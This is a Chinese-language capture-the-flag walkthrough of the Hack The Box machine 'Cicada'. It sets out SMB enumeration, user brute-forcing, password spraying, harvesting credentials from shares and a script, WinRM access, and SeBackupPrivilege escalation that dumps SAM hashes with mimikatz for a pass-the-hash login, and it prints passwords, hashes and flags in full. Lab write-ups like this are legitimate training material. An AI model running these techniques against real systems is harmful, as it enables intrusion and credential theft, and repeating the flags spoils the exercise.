目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名，这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG：0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG：b7c206ec1a5f03f4de21e622502f4005

---

连接至HTB服务器并启动靶机

靶机IP：10.10.11.35

分配IP：10.10.16.22

---

使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中，并提取端口号存入变量ports

ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p$ports -sCV 10.10.11.35

---

首先尝试空密码连接靶机SMB服务

smbclient -L 10.10.11.35

列出HR共享中的所有文件

smbclient -N \\\\10.10.11.35\\HR

将Notice from HR.txt文件下载到本地

get "Notice from HR.txt"

查看该文件内容

cat 'Notice from HR.txt'

密码：Cicada$M6Corpb*@Lp#nZp!8

---

由于不知道账户名，这里我们使用crackmapexec对smb服务进行用户爆破

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中，再将所有用户名进行提取

cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见，该密码对账户michael.wrightson生效

账户：michael.wrightson

密码：Cicada$M6Corpb*@Lp#nZp!8

---

通过该账户连接至靶机SMB服务器提取敏感信息

crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户：david.orelious

密码：aRt$Lp#7t*VQ!3

---

使用david.orelious用户凭证登录靶机SMB服务

smbclient -U david.orelious //10.10.11.35/DEV

将Backup_script.ps1文件下载到本地

get Backup_script.ps1

查看该文件内容

cat Backup_script.ps1

账户：emily.oscars

密码：Q!3@Lp#M6b*7t*Vt

---

使用evil-winrm通过上文凭证连接到靶机WinRM服务

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

cd C:\

查找user_flag位置

cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件，两个都查看内容发现是一样的

type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328
*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328

USER_FLAG：0c79a06b429a6c9144e52201714e6328

---

权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户：Administrator

密码：2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

cd C:\

查找root_flag位置

cmd.exe /c dir /s root.txt

查看root_flag内容

type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\
*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 1B60-8905

 Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

 Directory of C:\Users\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               2 File(s)             68 bytes
               0 Dir(s)   1,663,627,264 bytes free
*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"
b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG：b7c206ec1a5f03f4de21e622502f4005